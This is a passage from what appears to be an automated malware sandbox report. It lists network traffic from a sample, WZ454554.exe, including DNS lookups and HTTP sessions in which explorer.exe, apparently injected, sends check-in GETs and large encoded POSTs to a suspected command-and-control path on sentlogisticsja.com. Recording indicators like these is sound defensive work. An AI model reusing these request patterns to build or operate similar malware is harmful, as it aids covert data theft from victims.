                          Jan 13, 2022 20:23:55.084065914 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.102029085 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.102065086 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.102530003 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.102550983 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.102560997 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.102571964 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.102731943 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.102751017 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.103069067 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.103090048 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.103141069 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.103157997 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.108160973 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.118797064 CET804981934.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.118832111 CET804981934.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.118880033 CET4981980192.168.2.334.102.136.180
                          Jan 13, 2022 20:23:55.118906021 CET4981980192.168.2.334.102.136.180
                          Jan 13, 2022 20:23:55.142203093 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.142230034 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.142240047 CET804982034.102.136.180192.168.2.3
                          Jan 13, 2022 20:23:55.142297983 CET4982080192.168.2.334.102.136.180
                          Jan 13, 2022 20:23:55.142342091 CET4982080192.168.2.334.102.136.180

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 13, 2022 20:22:17.405059099 CET5280653192.168.2.38.8.8.8
                          Jan 13, 2022 20:22:17.427440882 CET53528068.8.8.8192.168.2.3
                          Jan 13, 2022 20:22:45.879775047 CET6402153192.168.2.38.8.8.8
                          Jan 13, 2022 20:22:45.899193048 CET53640218.8.8.8192.168.2.3
                          Jan 13, 2022 20:22:55.894634008 CET6078453192.168.2.38.8.8.8
                          Jan 13, 2022 20:22:55.914685011 CET53607848.8.8.8192.168.2.3
                          Jan 13, 2022 20:23:52.752675056 CET5836153192.168.2.38.8.8.8
                          Jan 13, 2022 20:23:52.776423931 CET53583618.8.8.8192.168.2.3
                          Jan 13, 2022 20:24:13.213082075 CET5072853192.168.2.38.8.8.8
                          Jan 13, 2022 20:24:13.288265944 CET53507288.8.8.8192.168.2.3
                          Jan 13, 2022 20:24:15.312231064 CET5377753192.168.2.38.8.8.8
                          Jan 13, 2022 20:24:15.380373001 CET53537778.8.8.8192.168.2.3
                          Jan 13, 2022 20:24:15.384635925 CET5710653192.168.2.38.8.8.8
                          Jan 13, 2022 20:24:15.420062065 CET53571068.8.8.8192.168.2.3

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Jan 13, 2022 20:22:17.405059099 CET192.168.2.38.8.8.80xd5a9Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:45.879775047 CET192.168.2.38.8.8.80xd6ceStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:55.894634008 CET192.168.2.38.8.8.80x3a3fStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                          Jan 13, 2022 20:23:52.752675056 CET192.168.2.38.8.8.80x7ebeStandard query (0)www.sentlogisticsja.comA (IP address)IN (0x0001)
                          Jan 13, 2022 20:24:13.213082075 CET192.168.2.38.8.8.80x54d0Standard query (0)www.senerants.techA (IP address)IN (0x0001)
                          Jan 13, 2022 20:24:15.312231064 CET192.168.2.38.8.8.80x83c4Standard query (0)www.senerants.techA (IP address)IN (0x0001)
                          Jan 13, 2022 20:24:15.384635925 CET192.168.2.38.8.8.80x79d3Standard query (0)www.senerants.techA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Jan 13, 2022 20:22:17.427440882 CET8.8.8.8192.168.2.30xd5a9No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:17.427440882 CET8.8.8.8192.168.2.30xd5a9No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:17.427440882 CET8.8.8.8192.168.2.30xd5a9No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:17.427440882 CET8.8.8.8192.168.2.30xd5a9No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:17.427440882 CET8.8.8.8192.168.2.30xd5a9No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:45.899193048 CET8.8.8.8192.168.2.30xd6ceNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:45.899193048 CET8.8.8.8192.168.2.30xd6ceNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:45.899193048 CET8.8.8.8192.168.2.30xd6ceNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:45.899193048 CET8.8.8.8192.168.2.30xd6ceNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:45.899193048 CET8.8.8.8192.168.2.30xd6ceNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:55.914685011 CET8.8.8.8192.168.2.30x3a3fNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:55.914685011 CET8.8.8.8192.168.2.30x3a3fNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:55.914685011 CET8.8.8.8192.168.2.30x3a3fNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:55.914685011 CET8.8.8.8192.168.2.30x3a3fNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:22:55.914685011 CET8.8.8.8192.168.2.30x3a3fNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                          Jan 13, 2022 20:23:52.776423931 CET8.8.8.8192.168.2.30x7ebeNo error (0)www.sentlogisticsja.comsentlogisticsja.comCNAME (Canonical name)IN (0x0001)
                          Jan 13, 2022 20:23:52.776423931 CET8.8.8.8192.168.2.30x7ebeNo error (0)sentlogisticsja.com34.102.136.180A (IP address)IN (0x0001)
                          Jan 13, 2022 20:24:13.288265944 CET8.8.8.8192.168.2.30x54d0Server failure (2)www.senerants.technonenoneA (IP address)IN (0x0001)
                          Jan 13, 2022 20:24:15.380373001 CET8.8.8.8192.168.2.30x83c4Server failure (2)www.senerants.technonenoneA (IP address)IN (0x0001)
                          Jan 13, 2022 20:24:15.420062065 CET8.8.8.8192.168.2.30x79d3Server failure (2)www.senerants.technonenoneA (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • cdn.discordapp.com
                          • www.sentlogisticsja.com

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.349746162.159.130.233443C:\Users\user\Desktop\WZ454554.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          1192.168.2.349747162.159.130.233443C:\Users\user\Desktop\WZ454554.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.349750162.159.130.233443C:\Users\user\Desktop\WZ454554.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          3192.168.2.349751162.159.135.233443C:\Users\user\Contacts\Hyrzbcwcas.exe
                          TimestampkBytes transferredDirectionData


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          4192.168.2.34981734.102.136.18080C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Jan 13, 2022 20:23:52.812988043 CET13794OUTGET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1
                          Host: www.sentlogisticsja.com
                          Connection: close
                          Data Raw: 00 00 00 00 00 00 00
                          Data Ascii:
                          Jan 13, 2022 20:23:52.928046942 CET13795INHTTP/1.1 403 Forbidden
                          Server: openresty
                          Date: Thu, 13 Jan 2022 19:23:52 GMT
                          Content-Type: text/html
                          Content-Length: 275
                          ETag: "6192576d-113"
                          Via: 1.1 google
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          5192.168.2.34981934.102.136.18080C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Jan 13, 2022 20:23:55.002516031 CET13804OUTPOST /m9g2/ HTTP/1.1
                          Host: www.sentlogisticsja.com
                          Connection: close
                          Content-Length: 409
                          Cache-Control: no-cache
                          Origin: http://www.sentlogisticsja.com
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://www.sentlogisticsja.com/m9g2/
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Data Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00
                          Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
                          Jan 13, 2022 20:23:55.118797064 CET13959INHTTP/1.1 405 Not Allowed
                          Server: openresty
                          Date: Thu, 13 Jan 2022 19:23:55 GMT
                          Content-Type: text/html
                          Content-Length: 154
                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Q9ZUYZO8/a7e5BdDlvaZwJJtx0FbiRvpYdiZ7D/aCsoMoi5qB+aQaBHkMGmhT3JB5UzlsiLB6/R1RX4oqybO9g
                          Via: 1.1 google
                          Connection: close
                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          6192.168.2.34982034.102.136.18080C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Jan 13, 2022 20:23:55.024300098 CET13818OUTPOST /m9g2/ HTTP/1.1
                          Host: www.sentlogisticsja.com
                          Connection: close
                          Content-Length: 149769
                          Cache-Control: no-cache
                          Origin: http://www.sentlogisticsja.com
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://www.sentlogisticsja.com/m9g2/
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Data Raw: 47 76 57 3d 6b 52 31 2d 31 57 43 36 50 43 78 73 52 48 79 37 66 35 58 5a 6e 58 4f 43 36 46 54 56 64 49 6e 53 4f 44 61 65 7a 30 6b 52 65 4f 4b 43 51 41 69 53 6e 70 52 64 44 46 51 5a 59 42 4e 5f 61 52 63 74 79 73 51 37 32 64 68 48 72 4c 62 73 50 76 75 51 46 7a 6c 72 32 66 39 38 46 55 37 76 67 63 55 34 53 34 43 2d 4e 51 37 45 5a 78 37 72 76 6b 6b 52 47 32 70 51 34 62 46 58 45 39 57 78 6e 6a 76 42 53 4a 7e 4c 62 51 61 2d 52 74 6b 44 6d 58 28 78 78 65 75 4d 4a 47 36 74 48 46 6c 53 4b 4c 6c 70 66 33 7a 37 55 78 66 66 72 39 72 6c 67 73 48 71 6a 32 39 6e 59 4c 33 42 61 33 4d 38 71 4c 78 36 59 51 37 54 51 49 44 58 32 30 57 6c 63 56 4f 54 79 66 43 69 71 4c 49 68 4c 4f 6b 53 37 36 46 6b 46 68 59 70 4d 33 6e 6e 57 5a 74 39 5a 53 44 44 41 76 49 6a 7e 34 6f 30 45 48 65 31 74 73 72 33 78 51 37 57 70 37 38 68 7a 61 54 56 51 32 33 4f 4f 36 65 43 6f 67 61 5a 71 2d 33 35 36 70 45 6c 4f 4e 5a 56 42 4c 52 6c 34 66 58 74 51 30 72 77 78 61 51 6c 37 63 41 44 55 77 32 50 6d 4e 31 54 46 77 7e 39 4c 50 75 35 58 68 67 34 62 7a 74 44 49 7a 4c 4a 41 38 4f 51 70 2d 28 4c 6d 77 5a 56 4d 48 46 37 35 62 59 74 33 56 65 66 74 56 63 79 4a 35 43 51 58 42 30 4a 71 68 4a 43 79 4a 67 34 7a 34 63 32 74 4b 67 5a 66 47 65 6f 71 70 42 37 6e 47 67 4e 54 35 44 53 5a 47 52 4f 74 61 4f 79 74 44 41 6d 53 50 71 64 68 65 75 44 4f 46 59 39 49 59 79 48 45 65 4b 2d 7e 73 7e 6a 59 33 4a 5f 48 64 62 68 6e 61 74 45 75 32 59 64 53 5a 47 79 6e 4e 35 55 76 4a 6a 48 4e 78 42 54 45 48 72 71 63 73 68 61 75 42 6d 6e 59 74 4a 73 45 4e 49 2d 64 45 6e 2d 69 6f 32 55 4f 47 4b 65 32 42 4b 52 44 32 37 35 33 78 44 53 71 7a 28 51 45 56 69 32 32 41 78 66 4b 4e 79 6b 4d 66 41 78 4d 41 77 78 7a 34 58 49 63 6d 42 53 39 69 32 4d 28 5a 65 66 35 2d 75 43 39 4c 63 4d 6c 6e 39 39 77 2d 31 4f 52 4c 47 65 56 6c 43 77 47 32 34 5a 66 6c 56 32 69 55 4e 34 6c 59 75 65 58 70 72 77 6b 47 49 56 42 6e 4f 52 47 34 50 51 62 49 41 74 4d 4f 48 74 5a 41 62 75 77 38 34 46 55 67 64 59 66 31 6d 32 48 38 65 5f 37 56 78 79 70 36 63 4b 41 44 65 4d 61 37 70 61 45 32 4e 75 68 75 30 77 77 4e 30 7a 4c 74 51 2d 42 6a 62 41 4b 70 73 45 4f 43 48 73 70 76 77 43 79 66 47 74 4a 39 75 61 57 56 30 77 51 4e 51 59 39 46 6a 61 43 43 51 4b 46 5a 72 6f 6f 31 41 4a 36 75 76 46 38 48 58 76 78 41 67 53 68 51 39 63 71 55 31 52 59 6f 73 38 68 63 7e 4f 51 6e 63 4f 76 44 4f 46 6f 6f 74 53 28 7a 5a 4d 64 42 78 30 57 2d 56 69 4c 78 37 51 69 58 63 58 46 63 48 56 63 44 72 41 42 66 50 76 4a 53 43 58 39 6a 47 32 53 56 4d 58 71 66 4c 61 63 47 44 6d 6a 4c 74 70 7a 65 32 63 59 52 71 6f 70 31 41 6a 68 66 63 79 69 5f 70 55 4c 4c 58 76 44 66 63 38 43 61 62 57 47 66 65 58 4e 75 4c 38 75 34 32 42 35 78 6d 62 54 7a 6f 7a 6d 64 75 65 31 6a 70 49 74 51 56 4a 56 42 35 31 65 51 49 41 6c 71 42 6d 7a 6c 69 6b 42 70 45 52 7e 73 37 37 66 32 63 67 6d 39 68 61 65 49 4d 49 53 48 51 48 67 5a 63 69 65 73 34 33 69 46 6f 59 5a 66 4a 58 72 38 35 6c 33 6d 4f 78 69 71 63 45 4f 4a 53 30 64 54 39 65 7a 5f 49 5f 75 31 64 6f 33 53 4c 50 39 51 6d 71 51 79 4d 44 4e 46 38 30 32 73 48 56 74 50 48 48 69 6a 37 79 57 79 72 6b 73 71 31 39 39 4b 49 33 5a 4d 6b 71 70 30 38 71 62 30 72 78 54 64 53 4a 7a 5f 7a 43 77 39 75 62 74 6d 5a 39 56 30 42 56 79 72 32 65 4e 71 36 49 6d 77 73 51 74 67 4f 44 58 49 66 53 36 41 6f 68 43 4f 56 4a 6f 61 32 71 34 4e 6f 45 78 36 50 65 6b 77 31 59 5a 71 77 70 69 64 66 63 49 5f 6e 55 66 74 47 70 4d 41 39 41 49 65 31 54 6b 33 30 6b 4d 59 38 47 76 73 68 58 55 6d 4f 6d 72 39 71 52 6c 5f 62 42 74 65 67 73 57 6d 39 30 4f 69 51 35 54 43 74 37 74 61 31 5f 31 69 41 73 36 45 30 33 65 64 6c 73 52 6e 47 79 31 54 31 4d 7a 6f 71 69 44 46 58 79 58 47 36 61 34 57 58 33 68 5a 4c 77 52 73 53 48 59 44 64 59 7e 4a 55 67 5a 6d 43 68 44 4f 43 2d 73 41 6b 6f 4f 57 6c 64 33 2d 37 41 38 6d 4b 77 6c 42 72 66 6f 68 7e 4c 53 45 71 6d 31 42 48 39 4e 6a 50 38 79 47 75 73 42 59 6e 6a 55 30 31 77 53 36 4c 4c 7a 72 46 56 79 42 47 6e 77 4e 38 64 6f 67 4a 4d 4c 56 33 4e 4f 4b 71 77 78 52 31 72 6d 75 43 5f 30 2d 56 65 76 77 32 74 75 69 49 63 5a 70 7e 36 54 6f 4d 35 73 61 6e 52 62 6f 35 66 77 64 66 34 38 34 76 55 39 31 43 30 71 73 46 58 4b 32 75 64 32 34 68 2d 44 32 4f 76 4d 7a 65 4e 4e 34 69
                          Data Ascii: GvW=kR1-1WC6PCxsRHy7f5XZnXOC6FTVdInSODaez0kReOKCQAiSnpRdDFQZYBN_aRctysQ72dhHrLbsPvuQFzlr2f98FU7vgcU4S4C-NQ7EZx7rvkkRG2pQ4bFXE9WxnjvBSJ~LbQa-RtkDmX(xxeuMJG6tHFlSKLlpf3z7Uxffr9rlgsHqj29nYL3Ba3M8qLx6YQ7TQIDX20WlcVOTyfCiqLIhLOkS76FkFhYpM3nnWZt9ZSDDAvIj~4o0EHe1tsr3xQ7Wp78hzaTVQ23OO6eCogaZq-356pElONZVBLRl4fXtQ0rwxaQl7cADUw2PmN1TFw~9LPu5Xhg4bztDIzLJA8OQp-(LmwZVMHF75bYt3VeftVcyJ5CQXB0JqhJCyJg4z4c2tKgZfGeoqpB7nGgNT5DSZGROtaOytDAmSPqdheuDOFY9IYyHEeK-~s~jY3J_HdbhnatEu2YdSZGynN5UvJjHNxBTEHrqcshauBmnYtJsENI-dEn-io2UOGKe2BKRD2753xDSqz(QEVi22AxfKNykMfAxMAwxz4XIcmBS9i2M(Zef5-uC9LcMln99w-1ORLGeVlCwG24ZflV2iUN4lYueXprwkGIVBnORG4PQbIAtMOHtZAbuw84FUgdYf1m2H8e_7Vxyp6cKADeMa7paE2Nuhu0wwN0zLtQ-BjbAKpsEOCHspvwCyfGtJ9uaWV0wQNQY9FjaCCQKFZroo1AJ6uvF8HXvxAgShQ9cqU1RYos8hc~OQncOvDOFootS(zZMdBx0W-ViLx7QiXcXFcHVcDrABfPvJSCX9jG2SVMXqfLacGDmjLtpze2cYRqop1Ajhfcyi_pULLXvDfc8CabWGfeXNuL8u42B5xmbTzozmdue1jpItQVJVB51eQIAlqBmzlikBpER~s77f2cgm9haeIMISHQHgZcies43iFoYZfJXr85l3mOxiqcEOJS0dT9ez_I_u1do3SLP9QmqQyMDNF802sHVtPHHij7yWyrksq199KI3ZMkqp08qb0rxTdSJz_zCw9ubtmZ9V0BVyr2eNq6ImwsQtgODXIfS6AohCOVJoa2q4NoEx6Pekw1YZqwpidfcI_nUftGpMA9AIe1Tk30kMY8GvshXUmOmr9qRl_bBtegsWm90OiQ5TCt7ta1_1iAs6E03edlsRnGy1T1MzoqiDFXyXG6a4WX3hZLwRsSHYDdY~JUgZmChDOC-sAkoOWld3-7A8mKwlBrfoh~LSEqm1BH9NjP8yGusBYnjU01wS6LLzrFVyBGnwN8dogJMLV3NOKqwxR1rmuC_0-Vevw2tuiIcZp~6ToM5sanRbo5fwdf484vU91C0qsFXK2ud24h-D2OvMzeNN4iVktRzuZXfVkmBSab7QGcSo7LemFNp1i8JonAFC8iooSZD8EIZHK4iUCDeTURRSLOdlD7J08~pW0Q4TNUptdK1htPXrNx-0N(8PtoKgbrr9_yjowcMYniPMJWmHxVac034MIIiVSNhRUWACtWbnsTTybW2Pe2CRtSsk_vEbgAbeyco9xQGnHbMPL5RF2FEW5K_3x8sfb(5xDUzsTcOm0rWsSAc~8mAXT6-QajZT5RAqpDJI2XDejWojBa3T1nsNCNHehfP~2zhljagufb_rHOzJv8S57xN9Fppxnpyfdx0UXuTlGoz3B6lOaNPVN6FoKWnfLSyF8zqAYwxb08U0qN10zuUEFn1qUhsqIR6gNknebKhLDWctLwIbOauU7y6ltvMw_DLkvFj52v75HPisIedY96iemjEpHARdsf5XBVTguT3qvQ-J_lzDRrvxeKkiefbPXA51qgbHC1KXbAaBAzT7blBAfs6yOXJfiN3lmlHFpF8RE6Loe6DsNox2XDFrYa6fUY25G~EjqpWPJelJoFI(ROugxymA4JqpMhHWYjDA78n5mspds6A77OsdQbiyGcHEIV8GS2LrKTy4vD63BoxhgXjI1vIgnagxrWnqgjsnspanxZw(uSMsRnNIE8xToRYWmnOq7S93RARnP3xN5y7ptBvAYUe~RSNtdcyZwfZsHWHXyjIfz3EIp7GPKVl~AS88GztauQS2XfKvOq8sL73JAQDQNF57JttHyWfV_ZTKLjaN8E2kD~YU-U4COqUAhibMyG6CQWgADDJ10HG~94rB_CQh9EqqokXj4Y_WM9ajCrYOfXhqVGixGzjDMgaWUjfmqnQ8vmTi_jM4jOwc_5UfNbjZYm_WSnfjpr3Cu9J86GE8fmS4GDYoqKp1ACT6Urmj2uPF4zYjR361Y~uRwVI6RowwcpjJNif4srkAURNn0VAYU3ERRIK(50zNo~u9butrMOJAiR0Ke2FyTJRePeQjyKrKIGWgZers930xwq43xgzy5K_eMh5VJ8Gnf3DQhtVoDtVRDTnUnusrhEeCWmis_HeT9f6NiNqPfr6(kX054Km3Xyl0_DOtq~YZLK2Vx4QQlA7mI2CMJO8KXKuKtfbsHOA8vujuoSA9IgvzZaOPggACQAaIT7WD0dLhcyf4GYZFVgljMrYbzBP1Z(X6_iboihDsAeciC5g4ku8jaXg5BCre0iCLJ3qS7Ra3Nr4nJD6dk4XVvYQavd90dVRdBsdkoPWeRG8PtW9yUJ80UqlG7NGCmbc94tCc3TfKa~YXjvftJks3ohkxs3p4CbkHb0rzRBaGi2eWDOi~JoOJGDZHIoyB22rxGfmaswvrVrhMdD5YnxLD0qhGdzxKxuLpKicZM2kf1n_nO93rFovwRK51mPOR5G1RvJfTLSboA(hbLD5EvxoexKmD5U4L4rolJIhV_l7~GYrRyB0iyQ5jwk7kFXgJoPSgCIlXVQlh0bC~50WZX2D(baUqf8JI7b6xF(X6eSZowKz9nnGwOET3KKPsN9csTc2~XlS3SNqDsh-S-ZUQL~EyvQKSxfpbARODgHRIf9LSQGbbJodR8ySqea2ZMO9eL3vg1S-Fo7bwH0EAu3OEOt2yjJvNH00xdELDNveJuo1bHTNqy2eceu3B1~ZX-TwYq79sThAAFBcdlvhEugb424ta2mj5ukRlrN5EyHiqHSM3m18J8gLItWzm6bsPcEXFU6N8scPpJ8YaKRTsSagOTtWAIrS2XMu9NkMhAzeoKafCleZbRbCvUTRySS6ladRKJWJ4eSwY3uldIHY209qlvDLvcoJYGSC~qIcH7MVSWrrO-iOcNg9o7a4Y-hIgnP6gqbaSmpWrGpdFxWRanQpyH2SCv09km5hSlQ8Yqn4DpX0G9U1sbJ-8H8vVtDFELEo2CUsHvMnbk8fDOqrisKwi0HfMfJ4F4GrPOMwfCrFUZ(yBdGaoa7qvMPa2oOZpcTZehxzz647yQnrsmS8PGxii8DANfnnOYgOXr9jeylPOEHwIDOAEeDku_lyNFXyhZ9TrVfgSjf43zRPQfgmXTf6fgg_iC3DeVuUQNNKIDb6RtAiwkzQQFGc9IMu8hcofPaNSen8Cv9CYeZkE-pGXZOzlUgF7HqRfFZUSj8_0MK1RKOJKIX_pyFgSUOPu1SQBDvt(n(HiWVhNCLVZHAGtOgjMUjKORpRJsmt18w2X_acAZORxpr91vMEZZAc5UdN(5iVCoLhzqUdiZCH1GjxTXz06M11M-F4CQK0xLNfKmyVdVakOaxZ454MPZUE5E8u~sPK1ZOGYAANYdy30LHz3Vdz9ACUUHJ-jzItbFkA38IMD7Zjaxqb46fUZ8EgKFpydxRYueCJ5Pl8KK4Hg0JyGjVla6gbZpflSukEuyKcKdjkzltZwoqbvW0JRMcn8leJoN9_LmOJTWM97FboruJFuHGIgNWu9JJvKIb2s4RwER63y9SnCPXjw8YpcHKas8GyYTddYLBfAla5yogXfVMS~HDsoD1Mi_6or1lfAoIAV8JBy7q9IevF57bVpvD4EkjiQDh4bdtxHDWDevb7cQusxvHOvyhJPBeh1712EWjmqlDcG_2JN2rGm